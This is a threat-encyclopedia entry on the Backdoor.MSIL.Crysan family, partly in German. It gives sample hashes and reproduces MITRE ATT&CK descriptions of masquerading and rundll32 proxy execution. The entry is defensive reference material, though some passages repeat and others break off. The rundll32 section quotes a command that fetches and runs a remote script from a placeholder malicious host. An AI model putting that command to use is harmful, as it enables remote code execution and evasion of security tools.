Kategorie: Backdoor
Backdoors sollen bösartigen Benutzern die Fernsteuerung über einen infizierten Computer ermöglichen. In Bezug auf die Funktionalität ähneln Backdoors vielen Verwaltungssystemen, die von Softwareentwicklern entworfen und vertrieben werden.Diese Arten von bösartigen Programmen ermöglichen es, alles zu tun, was der Autor auf dem infizierten Computer möchte: Dateien senden und empfangen, Dateien starten oder löschen, Nachrichten anzeigen, Daten löschen, den Computer neu starten usw.
Die Programme in dieser Kategorie werden häufig verwendet, um eine Gruppe von Opfercomputern zu vereinigen und ein Botnet- oder Zombie-Netzwerk zu bilden. Dies gibt bösartigen Benutzern die zentrale Kontrolle über eine Armee von infizierten Computern, die dann für kriminelle Zwecke verwendet werden können.
Es gibt auch eine Gruppe von Backdoors, die sich über Netzwerke verbreiten und andere Computer infizieren können, wie Net-Worms es tun. Der Unterschied ist, dass sich solche Backdoors nicht automatisch verbreiten (wie Net-Worms), sondern nur auf einen speziellen "Befehl" von dem bösartigen Benutzer, der sie kontrolliert.
Mehr Informationen
Plattform: MSIL
Die Common Intermediate Language (früher als Microsoft Intermediate Language oder MSIL bezeichnet) ist eine von Microsoft entwickelte Zwischensprache für das .NET Framework. CIL-Code wird von allen Microsoft .NET-Compilern in Microsoft Visual Studio (Visual Basic .NET, Visual C ++, Visual C # und anderen) generiert.Familie: Backdoor.MSIL.Crysan
No family descriptionExamples
9583B8AFBC187BB7E1DC01C672B3BE3F70D82A9E34FFE278F683E2D5FD69372A
96A08A692A3407D73A71E84C9554DC43
C87B1A544C6411236DA5612BE79ED63B
E2102591B99E6D187B13808079D1168A
Tactics and Techniques: Mitre*
TA0005
Defense Evasion
The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.
T1036.005
Masquerading: Match Legitimate Name or Location
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.
Adversaries may also use the same icon of the file they are trying to mimic.
T1218.011
System Binary Proxy Execution: Rundll32
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex:
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this:
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command
Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
rundll32.exe {DLLname, DLLfunction}).Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions
Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command
rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
* © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.